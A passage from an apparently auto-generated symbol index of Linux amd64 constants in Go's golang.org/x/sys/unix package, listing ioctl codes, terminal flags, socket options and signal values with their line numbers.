syscall.Signal(0x15) constant SIGTTOU (line 656) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 657) | SIGURG = syscall.Signal(0x17) constant SIGUSR1 (line 658) | SIGUSR1 = syscall.Signal(0xa) constant SIGUSR2 (line 659) | SIGUSR2 = syscall.Signal(0xc) constant SIGVTALRM (line 660) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 661) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 662) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 663) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_linux_amd64.go constant B1000000 (line 14) | B1000000 = 0x1008 constant B115200 (line 15) | B115200 = 0x1002 constant B1152000 (line 16) | B1152000 = 0x1009 constant B1500000 (line 17) | B1500000 = 0x100a constant B2000000 (line 18) | B2000000 = 0x100b constant B230400 (line 19) | B230400 = 0x1003 constant B2500000 (line 20) | B2500000 = 0x100c constant B3000000 (line 21) | B3000000 = 0x100d constant B3500000 (line 22) | B3500000 = 0x100e constant B4000000 (line 23) | B4000000 = 0x100f constant B460800 (line 24) | B460800 = 0x1004 constant B500000 (line 25) | B500000 = 0x1005 constant B57600 (line 26) | B57600 = 0x1001 constant B576000 (line 27) | B576000 = 0x1006 constant B921600 (line 28) | B921600 = 0x1007 constant BLKALIGNOFF (line 29) | BLKALIGNOFF = 0x127a constant BLKBSZGET (line 30) | BLKBSZGET = 0x80081270 constant BLKBSZSET (line 31) | BLKBSZSET = 0x40081271 constant BLKDISCARD (line 32) | BLKDISCARD = 0x1277 constant BLKDISCARDZEROES (line 33) | BLKDISCARDZEROES = 0x127c constant BLKFLSBUF (line 34) | BLKFLSBUF = 0x1261 constant BLKFRAGET (line 35) | BLKFRAGET = 0x1265 constant BLKFRASET (line 36) | BLKFRASET = 0x1264 constant BLKGETDISKSEQ (line 37) | BLKGETDISKSEQ = 0x80081280 constant BLKGETSIZE (line 38) | BLKGETSIZE = 0x1260 constant BLKGETSIZE64 (line 39) | BLKGETSIZE64 = 0x80081272 constant BLKIOMIN (line 40) | BLKIOMIN = 0x1278 constant BLKIOOPT (line 41) | BLKIOOPT = 0x1279 constant BLKPBSZGET (line 42) | BLKPBSZGET = 0x127b constant BLKRAGET (line 43) | BLKRAGET = 0x1263 constant BLKRASET (line 44) | BLKRASET = 0x1262 constant BLKROGET (line 45) | BLKROGET = 0x125e constant BLKROSET (line 46) | BLKROSET = 0x125d constant BLKROTATIONAL (line 47) | BLKROTATIONAL = 0x127e constant BLKRRPART (line 48) | BLKRRPART = 0x125f constant BLKSECDISCARD (line 49) | BLKSECDISCARD = 0x127d constant BLKSECTGET (line 50) | BLKSECTGET = 0x1267 constant BLKSECTSET (line 51) | BLKSECTSET = 0x1266 constant BLKSSZGET (line 52) | BLKSSZGET = 0x1268 constant BLKZEROOUT (line 53) | BLKZEROOUT = 0x127f constant BOTHER (line 54) | BOTHER = 0x1000 constant BS1 (line 55) | BS1 = 0x2000 constant BSDLY (line 56) | BSDLY = 0x2000 constant CBAUD (line 57) | CBAUD = 0x100f constant CBAUDEX (line 58) | CBAUDEX = 0x1000 constant CIBAUD (line 59) | CIBAUD = 0x100f0000 constant CLOCAL (line 60) | CLOCAL = 0x800 constant CR1 (line 61) | CR1 = 0x200 constant CR2 (line 62) | CR2 = 0x400 constant CR3 (line 63) | CR3 = 0x600 constant CRDLY (line 64) | CRDLY = 0x600 constant CREAD (line 65) | CREAD = 0x80 constant CS6 (line 66) | CS6 = 0x10 constant CS7 (line 67) | CS7 = 0x20 constant CS8 (line 68) | CS8 = 0x30 constant CSIZE (line 69) | CSIZE = 0x30 constant CSTOPB (line 70) | CSTOPB = 0x40 constant ECCGETLAYOUT (line 71) | ECCGETLAYOUT = 0x81484d11 constant ECCGETSTATS (line 72) | ECCGETSTATS = 0x80104d12 constant ECHOCTL (line 73) | ECHOCTL = 0x200 constant ECHOE (line 74) | ECHOE = 0x10 constant ECHOK (line 75) | ECHOK = 0x20 constant ECHOKE (line 76) | ECHOKE = 0x800 constant ECHONL (line 77) | ECHONL = 0x40 constant ECHOPRT (line 78) | ECHOPRT = 0x400 constant EFD_CLOEXEC (line 79) | EFD_CLOEXEC = 0x80000 constant EFD_NONBLOCK (line 80) | EFD_NONBLOCK = 0x800 constant EPOLL_CLOEXEC (line 81) | EPOLL_CLOEXEC = 0x80000 constant EXTPROC (line 82) | EXTPROC = 0x10000 constant FF1 (line 83) | FF1 = 0x8000 constant FFDLY (line 84) | FFDLY = 0x8000 constant FICLONE (line 85) | FICLONE = 0x40049409 constant FICLONERANGE (line 86) | FICLONERANGE = 0x4020940d constant FLUSHO (line 87) | FLUSHO = 0x1000 constant FP_XSTATE_MAGIC2 (line 88) | FP_XSTATE_MAGIC2 = 0x46505845 constant FS_IOC_ENABLE_VERITY (line 89) | FS_IOC_ENABLE_VERITY = 0x40806685 constant FS_IOC_GETFLAGS (line 90) | FS_IOC_GETFLAGS = 0x80086601 constant FS_IOC_GET_ENCRYPTION_NONCE (line 91) | FS_IOC_GET_ENCRYPTION_NONCE = 0x8010661b constant FS_IOC_GET_ENCRYPTION_POLICY (line 92) | FS_IOC_GET_ENCRYPTION_POLICY = 0x400c6615 constant FS_IOC_GET_ENCRYPTION_PWSALT (line 93) | FS_IOC_GET_ENCRYPTION_PWSALT = 0x40106614 constant FS_IOC_SETFLAGS (line 94) | FS_IOC_SETFLAGS = 0x40086602 constant FS_IOC_SET_ENCRYPTION_POLICY (line 95) | FS_IOC_SET_ENCRYPTION_POLICY = 0x800c6613 constant F_GETLK (line 96) | F_GETLK = 0x5 constant F_GETLK64 (line 97) | F_GETLK64 = 0x5 constant F_GETOWN (line 98) | F_GETOWN = 0x9 constant F_RDLCK (line 99) | F_RDLCK = 0x0 constant F_SETLK (line 100) | F_SETLK = 0x6 constant F_SETLK64 (line 101) | F_SETLK64 = 0x6 constant F_SETLKW (line 102) | F_SETLKW = 0x7 constant F_SETLKW64 (line 103) | F_SETLKW64 = 0x7 constant F_SETOWN (line 104) | F_SETOWN = 0x8 constant F_UNLCK (line 105) | F_UNLCK = 0x2 constant F_WRLCK (line 106) | F_WRLCK = 0x1 constant HIDIOCGRAWINFO (line 107) | HIDIOCGRAWINFO = 0x80084803 constant HIDIOCGRDESC (line 108) | HIDIOCGRDESC = 0x90044802 constant HIDIOCGRDESCSIZE (line 109) | HIDIOCGRDESCSIZE = 0x80044801 constant HUPCL (line 110) | HUPCL = 0x400 constant ICANON (line 111) | ICANON = 0x2 constant IEXTEN (line 112) | IEXTEN = 0x8000 constant IN_CLOEXEC (line 113) | IN_CLOEXEC = 0x80000 constant IN_NONBLOCK (line 114) | IN_NONBLOCK = 0x800 constant IOCTL_VM_SOCKETS_GET_LOCAL_CID (line 115) | IOCTL_VM_SOCKETS_GET_LOCAL_CID = 0x7b9 constant ISIG (line 116) | ISIG = 0x1 constant IUCLC (line 117) | IUCLC = 0x200 constant IXOFF (line 118) | IXOFF = 0x1000 constant IXON (line 119) | IXON = 0x400 constant MAP_32BIT (line 120) | MAP_32BIT = 0x40 constant MAP_ANON (line 121) | MAP_ANON = 0x20 constant MAP_ANONYMOUS (line 122) | MAP_ANONYMOUS = 0x20 constant MAP_DENYWRITE (line 123) | MAP_DENYWRITE = 0x800 constant MAP_EXECUTABLE (line 124) | MAP_EXECUTABLE = 0x1000 constant MAP_GROWSDOWN (line 125) | MAP_GROWSDOWN = 0x100 constant MAP_HUGETLB (line 126) | MAP_HUGETLB = 0x40000 constant MAP_LOCKED (line 127) | MAP_LOCKED = 0x2000 constant MAP_NONBLOCK (line 128) | MAP_NONBLOCK = 0x10000 constant MAP_NORESERVE (line 129) | MAP_NORESERVE = 0x4000 constant MAP_POPULATE (line 130) | MAP_POPULATE = 0x8000 constant MAP_STACK (line 131) | MAP_STACK = 0x20000 constant MAP_SYNC (line 132) | MAP_SYNC = 0x80000 constant MCL_CURRENT (line 133) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 134) | MCL_FUTURE = 0x2 constant MCL_ONFAULT (line 135) | MCL_ONFAULT = 0x4 constant MEMERASE (line 136) | MEMERASE = 0x40084d02 constant MEMERASE64 (line 137) | MEMERASE64 = 0x40104d14 constant MEMGETBADBLOCK (line 138) | MEMGETBADBLOCK = 0x40084d0b constant MEMGETINFO (line 139) | MEMGETINFO = 0x80204d01 constant MEMGETOOBSEL (line 140) | MEMGETOOBSEL = 0x80c84d0a constant MEMGETREGIONCOUNT (line 141) | MEMGETREGIONCOUNT = 0x80044d07 constant MEMISLOCKED (line 142) | MEMISLOCKED = 0x80084d17 constant MEMLOCK (line 143) | MEMLOCK = 0x40084d05 constant MEMREAD (line 144) | MEMREAD = 0xc0404d1a constant MEMREADOOB (line 145) | MEMREADOOB = 0xc0104d04 constant MEMSETBADBLOCK (line 146) | MEMSETBADBLOCK = 0x40084d0c constant MEMUNLOCK (line 147) | MEMUNLOCK = 0x40084d06 constant MEMWRITEOOB (line 148) | MEMWRITEOOB = 0xc0104d03 constant MTDFILEMODE (line 149) | MTDFILEMODE = 0x4d13 constant NFDBITS (line 150) | NFDBITS = 0x40 constant NLDLY (line 151) | NLDLY = 0x100 constant NOFLSH (line 152) | NOFLSH = 0x80 constant NS_GET_NSTYPE (line 153) | NS_GET_NSTYPE = 0xb703 constant NS_GET_OWNER_UID (line 154) | NS_GET_OWNER_UID = 0xb704 constant NS_GET_PARENT (line 155) | NS_GET_PARENT = 0xb702 constant NS_GET_USERNS (line 156) | NS_GET_USERNS = 0xb701 constant OLCUC (line 157) | OLCUC = 0x2 constant ONLCR (line 158) | ONLCR = 0x4 constant OTPERASE (line 159) | OTPERASE = 0x400c4d19 constant OTPGETREGIONCOUNT (line 160) | OTPGETREGIONCOUNT = 0x40044d0e constant OTPGETREGIONINFO (line 161) | OTPGETREGIONINFO = 0x400c4d0f constant OTPLOCK (line 162) | OTPLOCK = 0x800c4d10 constant OTPSELECT (line 163) | OTPSELECT = 0x80044d0d constant O_APPEND (line 164) | O_APPEND = 0x400 constant O_ASYNC (line 165) | O_ASYNC = 0x2000 constant O_CLOEXEC (line 166) | O_CLOEXEC = 0x80000 constant O_CREAT (line 167) | O_CREAT = 0x40 constant O_DIRECT (line 168) | O_DIRECT = 0x4000 constant O_DIRECTORY (line 169) | O_DIRECTORY = 0x10000 constant O_DSYNC (line 170) | O_DSYNC = 0x1000 constant O_EXCL (line 171) | O_EXCL = 0x80 constant O_FSYNC (line 172) | O_FSYNC = 0x101000 constant O_LARGEFILE (line 173) | O_LARGEFILE = 0x0 constant O_NDELAY (line 174) | O_NDELAY = 0x800 constant O_NOATIME (line 175) | O_NOATIME = 0x40000 constant O_NOCTTY (line 176) | O_NOCTTY = 0x100 constant O_NOFOLLOW (line 177) | O_NOFOLLOW = 0x20000 constant O_NONBLOCK (line 178) | O_NONBLOCK = 0x800 constant O_PATH (line 179) | O_PATH = 0x200000 constant O_RSYNC (line 180) | O_RSYNC = 0x101000 constant O_SYNC (line 181) | O_SYNC = 0x101000 constant O_TMPFILE (line 182) | O_TMPFILE = 0x410000 constant O_TRUNC (line 183) | O_TRUNC = 0x200 constant PARENB (line 184) | PARENB = 0x100 constant PARODD (line 185) | PARODD = 0x200 constant PENDIN (line 186) | PENDIN = 0x4000 constant PERF_EVENT_IOC_DISABLE (line 187) | PERF_EVENT_IOC_DISABLE = 0x2401 constant PERF_EVENT_IOC_ENABLE (line 188) | PERF_EVENT_IOC_ENABLE = 0x2400 constant PERF_EVENT_IOC_ID (line 189) | PERF_EVENT_IOC_ID = 0x80082407 constant PERF_EVENT_IOC_MODIFY_ATTRIBUTES (line 190) | PERF_EVENT_IOC_MODIFY_ATTRIBUTES = 0x4008240b constant PERF_EVENT_IOC_PAUSE_OUTPUT (line 191) | PERF_EVENT_IOC_PAUSE_OUTPUT = 0x40042409 constant PERF_EVENT_IOC_PERIOD (line 192) | PERF_EVENT_IOC_PERIOD = 0x40082404 constant PERF_EVENT_IOC_QUERY_BPF (line 193) | PERF_EVENT_IOC_QUERY_BPF = 0xc008240a constant PERF_EVENT_IOC_REFRESH (line 194) | PERF_EVENT_IOC_REFRESH = 0x2402 constant PERF_EVENT_IOC_RESET (line 195) | PERF_EVENT_IOC_RESET = 0x2403 constant PERF_EVENT_IOC_SET_BPF (line 196) | PERF_EVENT_IOC_SET_BPF = 0x40042408 constant PERF_EVENT_IOC_SET_FILTER (line 197) | PERF_EVENT_IOC_SET_FILTER = 0x40082406 constant PERF_EVENT_IOC_SET_OUTPUT (line 198) | PERF_EVENT_IOC_SET_OUTPUT = 0x2405 constant PPPIOCATTACH (line 199) | PPPIOCATTACH = 0x4004743d constant PPPIOCATTCHAN (line 200) | PPPIOCATTCHAN = 0x40047438 constant PPPIOCBRIDGECHAN (line 201) | PPPIOCBRIDGECHAN = 0x40047435 constant PPPIOCCONNECT (line 202) | PPPIOCCONNECT = 0x4004743a constant PPPIOCDETACH (line 203) | PPPIOCDETACH = 0x4004743c constant PPPIOCDISCONN (line 204) | PPPIOCDISCONN = 0x7439 constant PPPIOCGASYNCMAP (line 205) | PPPIOCGASYNCMAP = 0x80047458 constant PPPIOCGCHAN (line 206) | PPPIOCGCHAN = 0x80047437 constant PPPIOCGDEBUG (line 207) | PPPIOCGDEBUG = 0x80047441 constant PPPIOCGFLAGS (line 208) | PPPIOCGFLAGS = 0x8004745a constant PPPIOCGIDLE (line 209) | PPPIOCGIDLE = 0x8010743f constant PPPIOCGIDLE32 (line 210) | PPPIOCGIDLE32 = 0x8008743f constant PPPIOCGIDLE64 (line 211) | PPPIOCGIDLE64 = 0x8010743f constant PPPIOCGL2TPSTATS (line 212) | PPPIOCGL2TPSTATS = 0x80487436 constant PPPIOCGMRU (line 213) | PPPIOCGMRU = 0x80047453 constant PPPIOCGRASYNCMAP (line 214) | PPPIOCGRASYNCMAP = 0x80047455 constant PPPIOCGUNIT (line 215) | PPPIOCGUNIT = 0x80047456 constant PPPIOCGXASYNCMAP (line 216) | PPPIOCGXASYNCMAP = 0x80207450 constant PPPIOCSACTIVE (line 217) | PPPIOCSACTIVE = 0x40107446 constant PPPIOCSASYNCMAP (line 218) | PPPIOCSASYNCMAP = 0x40047457 constant PPPIOCSCOMPRESS (line 219) | PPPIOCSCOMPRESS = 0x4010744d constant PPPIOCSDEBUG (line 220) | PPPIOCSDEBUG = 0x40047440 constant PPPIOCSFLAGS (line 221) | PPPIOCSFLAGS = 0x40047459 constant PPPIOCSMAXCID (line 222) | PPPIOCSMAXCID = 0x40047451 constant PPPIOCSMRRU (line 223) | PPPIOCSMRRU = 0x4004743b constant PPPIOCSMRU (line 224) | PPPIOCSMRU = 0x40047452 constant PPPIOCSNPMODE (line 225) | PPPIOCSNPMODE = 0x4008744b constant PPPIOCSPASS (line 226) | PPPIOCSPASS = 0x40107447 constant PPPIOCSRASYNCMAP (line 227) | PPPIOCSRASYNCMAP = 0x40047454 constant PPPIOCSXASYNCMAP (line 228) | PPPIOCSXASYNCMAP = 0x4020744f constant PPPIOCUNBRIDGECHAN (line 229) | PPPIOCUNBRIDGECHAN = 0x7434 constant PPPIOCXFERUNIT (line 230) | PPPIOCXFERUNIT = 0x744e constant PR_SET_PTRACER_ANY (line 231) | PR_SET_PTRACER_ANY = 0xffffffffffffffff constant PTRACE_ARCH_PRCTL (line 232) | PTRACE_ARCH_PRCTL = 0x1e constant PTRACE_GETFPREGS (line 233) | PTRACE_GETFPREGS = 0xe constant PTRACE_GETFPXREGS (line 234) | PTRACE_GETFPXREGS = 0x12 constant PTRACE_GET_THREAD_AREA (line 235) | PTRACE_GET_THREAD_AREA = 0x19 constant PTRACE_OLDSETOPTIONS (line 236) | PTRACE_OLDSETOPTIONS = 0x15 constant PTRACE_SETFPREGS (line 237) | PTRACE_SETFPREGS = 0xf constant PTRACE_SETFPXREGS (line 238) | PTRACE_SETFPXREGS = 0x13 constant PTRACE_SET_THREAD_AREA (line 239) | PTRACE_SET_THREAD_AREA = 0x1a constant PTRACE_SINGLEBLOCK (line 240) | PTRACE_SINGLEBLOCK = 0x21 constant PTRACE_SYSEMU (line 241) | PTRACE_SYSEMU = 0x1f constant PTRACE_SYSEMU_SINGLESTEP (line 242) | PTRACE_SYSEMU_SINGLESTEP = 0x20 constant RLIMIT_AS (line 243) | RLIMIT_AS = 0x9 constant RLIMIT_MEMLOCK (line 244) | RLIMIT_MEMLOCK = 0x8 constant RLIMIT_NOFILE (line 245) | RLIMIT_NOFILE = 0x7 constant RLIMIT_NPROC (line 246) | RLIMIT_NPROC = 0x6 constant RLIMIT_RSS (line 247) | RLIMIT_RSS = 0x5 constant RNDADDENTROPY (line 248) | RNDADDENTROPY = 0x40085203 constant RNDADDTOENTCNT (line 249) | RNDADDTOENTCNT = 0x40045201 constant RNDCLEARPOOL (line 250) | RNDCLEARPOOL = 0x5206 constant RNDGETENTCNT (line 251) | RNDGETENTCNT = 0x80045200 constant RNDGETPOOL (line 252) | RNDGETPOOL = 0x80085202 constant RNDRESEEDCRNG (line 253) | RNDRESEEDCRNG = 0x5207 constant RNDZAPENTCNT (line 254) | RNDZAPENTCNT = 0x5204 constant RTC_AIE_OFF (line 255) | RTC_AIE_OFF = 0x7002 constant RTC_AIE_ON (line 256) | RTC_AIE_ON = 0x7001 constant RTC_ALM_READ (line 257) | RTC_ALM_READ = 0x80247008 constant RTC_ALM_SET (line 258) | RTC_ALM_SET = 0x40247007 constant RTC_EPOCH_READ (line 259) | RTC_EPOCH_READ = 0x8008700d constant RTC_EPOCH_SET (line 260) | RTC_EPOCH_SET = 0x4008700e constant RTC_IRQP_READ (line 261) | RTC_IRQP_READ = 0x8008700b constant RTC_IRQP_SET (line 262) | RTC_IRQP_SET = 0x4008700c constant RTC_PARAM_GET (line 263) | RTC_PARAM_GET = 0x40187013 constant RTC_PARAM_SET (line 264) | RTC_PARAM_SET = 0x40187014 constant RTC_PIE_OFF (line 265) | RTC_PIE_OFF = 0x7006 constant RTC_PIE_ON (line 266) | RTC_PIE_ON = 0x7005 constant RTC_PLL_GET (line 267) | RTC_PLL_GET = 0x80207011 constant RTC_PLL_SET (line 268) | RTC_PLL_SET = 0x40207012 constant RTC_RD_TIME (line 269) | RTC_RD_TIME = 0x80247009 constant RTC_SET_TIME (line 270) | RTC_SET_TIME = 0x4024700a constant RTC_UIE_OFF (line 271) | RTC_UIE_OFF = 0x7004 constant RTC_UIE_ON (line 272) | RTC_UIE_ON = 0x7003 constant RTC_VL_CLR (line 273) | RTC_VL_CLR = 0x7014 constant RTC_VL_READ (line 274) | RTC_VL_READ = 0x80047013 constant RTC_WIE_OFF (line 275) | RTC_WIE_OFF = 0x7010 constant RTC_WIE_ON (line 276) | RTC_WIE_ON = 0x700f constant RTC_WKALM_RD (line 277) | RTC_WKALM_RD = 0x80287010 constant RTC_WKALM_SET (line 278) | RTC_WKALM_SET = 0x4028700f constant SCM_TIMESTAMPING (line 279) | SCM_TIMESTAMPING = 0x25 constant SCM_TIMESTAMPING_OPT_STATS (line 280) | SCM_TIMESTAMPING_OPT_STATS = 0x36 constant SCM_TIMESTAMPING_PKTINFO (line 281) | SCM_TIMESTAMPING_PKTINFO = 0x3a constant SCM_TIMESTAMPNS (line 282) | SCM_TIMESTAMPNS = 0x23 constant SCM_TXTIME (line 283) | SCM_TXTIME = 0x3d constant SCM_WIFI_STATUS (line 284) | SCM_WIFI_STATUS = 0x29 constant SECCOMP_IOCTL_NOTIF_ADDFD (line 285) | SECCOMP_IOCTL_NOTIF_ADDFD = 0x40182103 constant SECCOMP_IOCTL_NOTIF_ID_VALID (line 286) | SECCOMP_IOCTL_NOTIF_ID_VALID = 0x40082102 constant SECCOMP_IOCTL_NOTIF_SET_FLAGS (line 287) | SECCOMP_IOCTL_NOTIF_SET_FLAGS = 0x40082104 constant SFD_CLOEXEC (line 288) | SFD_CLOEXEC = 0x80000 constant SFD_NONBLOCK (line 289) | SFD_NONBLOCK = 0x800 constant SIOCATMARK (line 290) | SIOCATMARK = 0x8905 constant SIOCGPGRP (line 291) | SIOCGPGRP = 0x8904 constant SIOCGSTAMPNS_NEW (line 292) | SIOCGSTAMPNS_NEW = 0x80108907 constant SIOCGSTAMP_NEW (line 293) | SIOCGSTAMP_NEW = 0x80108906 constant SIOCINQ (line 294) | SIOCINQ = 0x541b constant SIOCOUTQ (line 295) | SIOCOUTQ = 0x5411 constant SIOCSPGRP (line 296) | SIOCSPGRP = 0x8902 constant SOCK_CLOEXEC (line 297) | SOCK_CLOEXEC = 0x80000 constant SOCK_DGRAM (line 298) | SOCK_DGRAM = 0x2 constant SOCK_NONBLOCK (line 299) | SOCK_NONBLOCK = 0x800 constant SOCK_STREAM (line 300) | SOCK_STREAM = 0x1 constant SOL_SOCKET (line 301) | SOL_SOCKET = 0x1 constant SO_ACCEPTCONN (line 302) | SO_ACCEPTCONN = 0x1e constant SO_ATTACH_BPF (line 303) | SO_ATTACH_BPF = 0x32 constant SO_ATTACH_REUSEPORT_CBPF (line 304) | SO_ATTACH_REUSEPORT_CBPF = 0x33 constant SO_ATTACH_REUSEPORT_EBPF (line 305) | SO_ATTACH_REUSEPORT_EBPF = 0x34 constant SO_BINDTODEVICE (line 306) | SO_BINDTODEVICE = 0x19 constant SO_BINDTOIFINDEX (line 307) | SO_BINDTOIFINDEX = 0x3e constant SO_BPF_EXTENSIONS (line 308) | SO_BPF_EXTENSIONS = 0x30 constant SO_BROADCAST (line 309) | SO_BROADCAST = 0x6 constant SO_BSDCOMPAT (line 310) | SO_BSDCOMPAT = 0xe constant SO_BUF_LOCK (line 311) | SO_BUF_LOCK = 0x48 constant SO_BUSY_POLL (line 312) | SO_BUSY_POLL = 0x2e constant SO_BUSY_POLL_BUDGET (line 313) | SO_BUSY_POLL_BUDGET = 0x46 constant SO_CNX_ADVICE (line 314) | SO_CNX_ADVICE = 0x35 constant SO_COOKIE (line 315) | SO_COOKIE = 0x39 constant SO_DETACH_REUSEPORT_BPF (line 316) | SO_DETACH_REUSEPORT_BPF = 0x44 constant SO_DOMAIN (line 317) | SO_DOMAIN = 0x27 constant SO_DONTROUTE (line 318) | SO_DONTROUTE = 0x5 constant SO_ERROR (line 319) | SO_ERROR = 0x4 constant SO_INCOMING_CPU (line 320) | SO_INCOMING_CPU = 0x31 constant SO_INCOMING_NAPI_ID (line 321) | SO_INCOMING_NAPI_ID = 0x38 constant SO_KEEPALIVE (line 322) | SO_KEEPALIVE = 0x9 constant SO_LINGER (line 323) | SO_LINGER = 0xd constant SO_LOCK_FILTER (line 324) | SO_LOCK_FILTER = 0x2c constant SO_MARK (line 325) | SO_MARK = 0x24 constant SO_MAX_PACING_RATE (line 326) | SO_MAX_PACING_RATE = 0x2f constant SO_MEMINFO (line 327) | SO_MEMINFO = 0x37 constant SO_NETNS_COOKIE (line 328) | SO_NETNS_COOKIE = 0x47 constant SO_NOFCS (line 329) | SO_NOFCS = 0x2b constant SO_OOBINLINE (line 330) | SO_OOBINLINE = 0xa constant SO_PASSCRED (line 331) | SO_PASSCRED = 0x10 constant SO_PASSPIDFD (line 332) | SO_PASSPIDFD = 0x4c constant SO_PASSSEC (line 333) | SO_PASSSEC = 0x22 constant SO_PEEK_OFF (line 334) | SO_PEEK_OFF = 0x2a constant SO_PEERCRED (line 335) | SO_PEERCRED = 0x11 constant SO_PEERGROUPS (line 336) | SO_PEERGROUPS = 0x3b constant SO_PEERPIDFD (line 337) | SO_PEERPIDFD = 0x4d constant SO_PEERSEC (line 338) | SO_PEERSEC = 0x1f constant SO_PREFER_BUSY_POLL (line 339) | SO_PREFER_BUSY_POLL = 0x45 constant SO_PROTOCOL (line 340) | SO_PROTOCOL = 0x26 constant SO_RCVBUF (line 341) | SO_RCVBUF = 0x8 constant SO_RCVBUFFORCE (line 342) | SO_RCVBUFFORCE = 0x21 constant SO_RCVLOWAT (line 343) | SO_RCVLOWAT = 0x12 constant SO_RCVMARK (line 344) | SO_RCVMARK = 0x4b constant SO_RCVTIMEO (line 345) | SO_RCVTIMEO = 0x14 constant SO_RCVTIMEO_NEW (line 346) | SO_RCVTIMEO_NEW = 0x42 constant SO_RCVTIMEO_OLD (line 347) | SO_RCVTIMEO_OLD = 0x14 constant SO_RESERVE_MEM (line 348) | SO_RESERVE_MEM = 0x49 constant SO_REUSEADDR (line 349) | SO_REUSEADDR = 0x2 constant SO_REUSEPORT (line 350) | SO_REUSEPORT = 0xf constant SO_RXQ_OVFL (line 351) | SO_RXQ_OVFL = 0x28 constant SO_SECURITY_AUTHENTICATION (line 352) | SO_SECURITY_AUTHENTICATION = 0x16 constant SO_SECURITY_ENCRYPTION_NETWORK (line 353) | SO_SECURITY_ENCRYPTION_NETWORK = 0x18 constant SO_SECURITY_ENCRYPTION_TRANSPORT (line 354) | SO_SECURITY_ENCRYPTION_TRANSPORT = 0x17 constant SO_SELECT_ERR_QUEUE (line 355) | SO_SELECT_ERR_QUEUE = 0x2d constant SO_SNDBUF (line 356) | SO_SNDBUF = 0x7 constant SO_SNDBUFFORCE (line 357) | SO_SNDBUFFORCE = 0x20 constant SO_SNDLOWAT (line 358) | SO_SNDLOWAT = 0x13 constant SO_SNDTIMEO (line 359) | SO_SNDTIMEO = 0x15 constant SO_SNDTIMEO_NEW (line 360) | SO_SNDTIMEO_NEW = 0x43 constant SO_SNDTIMEO_OLD (line 361) | SO_SNDTIMEO_OLD = 0x15 constant SO_TIMESTAMPING (line 362) | SO_TIMESTAMPING = 0x25 constant SO_TIMESTAMPING_NEW (line 363) | SO_TIMESTAMPING_NEW = 0x41 constant SO_TIMESTAMPING_OLD (line 364) | SO_TIMESTAMPING_OLD = 0x25 constant SO_TIMESTAMPNS (line 365) | SO_TIMESTAMPNS = 0x23 constant SO_TIMESTAMPNS_NEW (line 366) | SO_TIMESTAMPNS_NEW = 0x40 constant SO_TIMESTAMPNS_OLD (line 367) | SO_TIMESTAMPNS_OLD = 0x23 constant SO_TIMESTAMP_NEW (line 368) | SO_TIMESTAMP_NEW = 0x3f constant SO_TXREHASH (line 369) | SO_TXREHASH = 0x4a constant SO_TXTIME (line 370) | SO_TXTIME = 0x3d constant SO_TYPE (line 371) | SO_TYPE = 0x3 constant SO_WIFI_STATUS (line 372) | SO_WIFI_STATUS = 0x29 constant SO_ZEROCOPY (line 373) | SO_ZEROCOPY = 0x3c constant TAB1 (line 374) | TAB1 = 0x800 constant TAB2 (line 375) | TAB2 = 0x1000 constant TAB3 (line 376) | TAB3 = 0x1800 constant TABDLY (line 377) | TABDLY = 0x1800 constant TCFLSH (line 378) | TCFLSH = 0x540b constant TCGETA (line 379) | TCGETA = 0x5405 constant TCGETS (line 380) | TCGETS = 0x5401 constant TCGETS2 (line 381) | TCGETS2 = 0x802c542a constant TCGETX (line 382) | TCGETX = 0x5432 constant TCSAFLUSH (line 383) | TCSAFLUSH = 0x2 constant TCSBRK (line 384) | TCSBRK = 0x5409 constant TCSBRKP (line 385) | TCSBRKP = 0x5425 constant TCSETA (line 386) | TCSETA = 0x5406 constant TCSETAF (line 387) | TCSETAF = 0x5408 constant TCSETAW (line 388) | TCSETAW = 0x5407 constant TCSETS (line 389) | TCSETS = 0x5402 constant TCSETS2 (line 390) | TCSETS2 = 0x402c542b constant TCSETSF (line 391) | TCSETSF = 0x5404 constant TCSETSF2 (line 392) | TCSETSF2 = 0x402c542d constant TCSETSW (line 393) | TCSETSW = 0x5403 constant TCSETSW2 (line 394) | TCSETSW2 = 0x402c542c constant TCSETX (line 395) | TCSETX = 0x5433 constant TCSETXF (line 396) | TCSETXF = 0x5434 constant TCSETXW (line 397) | TCSETXW = 0x5435 constant TCXONC (line 398) | TCXONC = 0x540a constant TFD_CLOEXEC (line 399) | TFD_CLOEXEC = 0x80000 constant TFD_NONBLOCK (line 400) | TFD_NONBLOCK = 0x800 constant TIOCCBRK (line 401) | TIOCCBRK = 0x5428 constant TIOCCONS (line 402) | TIOCCONS = 0x541d constant TIOCEXCL (line 403) | TIOCEXCL = 0x540c constant TIOCGDEV (line 404) | TIOCGDEV = 0x80045432 constant TIOCGETD (line 405) | TIOCGETD = 0x5424 constant TIOCGEXCL (line 406) | TIOCGEXCL = 0x80045440 constant TIOCGICOUNT (line 407) | TIOCGICOUNT = 0x545d constant TIOCGISO7816 (line 408) | TIOCGISO7816 = 0x80285442 constant TIOCGLCKTRMIOS (line 409) | TIOCGLCKTRMIOS = 0x5456 constant TIOCGPGRP (line 410) | TIOCGPGRP = 0x540f constant TIOCGPKT (line 411) | TIOCGPKT = 0x80045438 constant TIOCGPTLCK (line 412) | TIOCGPTLCK = 0x80045439 constant TIOCGPTN (line 413) | TIOCGPTN = 0x80045430 constant TIOCGPTPEER (line 414) | TIOCGPTPEER = 0x5441 constant TIOCGRS485 (line 415) | TIOCGRS485 = 0x542e constant TIOCGSERIAL (line 416) | TIOCGSERIAL = 0x541e constant TIOCGSID (line 417) | TIOCGSID = 0x5429 constant TIOCGSOFTCAR (line 418) | TIOCGSOFTCAR = 0x5419 constant TIOCGWINSZ (line 419) | TIOCGWINSZ = 0x5413 constant TIOCINQ (line 420) | TIOCINQ = 0x541b constant TIOCLINUX (line 421) | TIOCLINUX = 0x541c constant TIOCMBIC (line 422) | TIOCMBIC = 0x5417 constant TIOCMBIS (line 423) | TIOCMBIS = 0x5416 constant TIOCMGET (line 424) | TIOCMGET = 0x5415 constant TIOCMIWAIT (line 425) | TIOCMIWAIT = 0x545c constant TIOCMSET (line 426) | TIOCMSET = 0x5418 constant TIOCM_CAR (line 427) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 428) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 429) | TIOCM_CTS = 0x20 constant 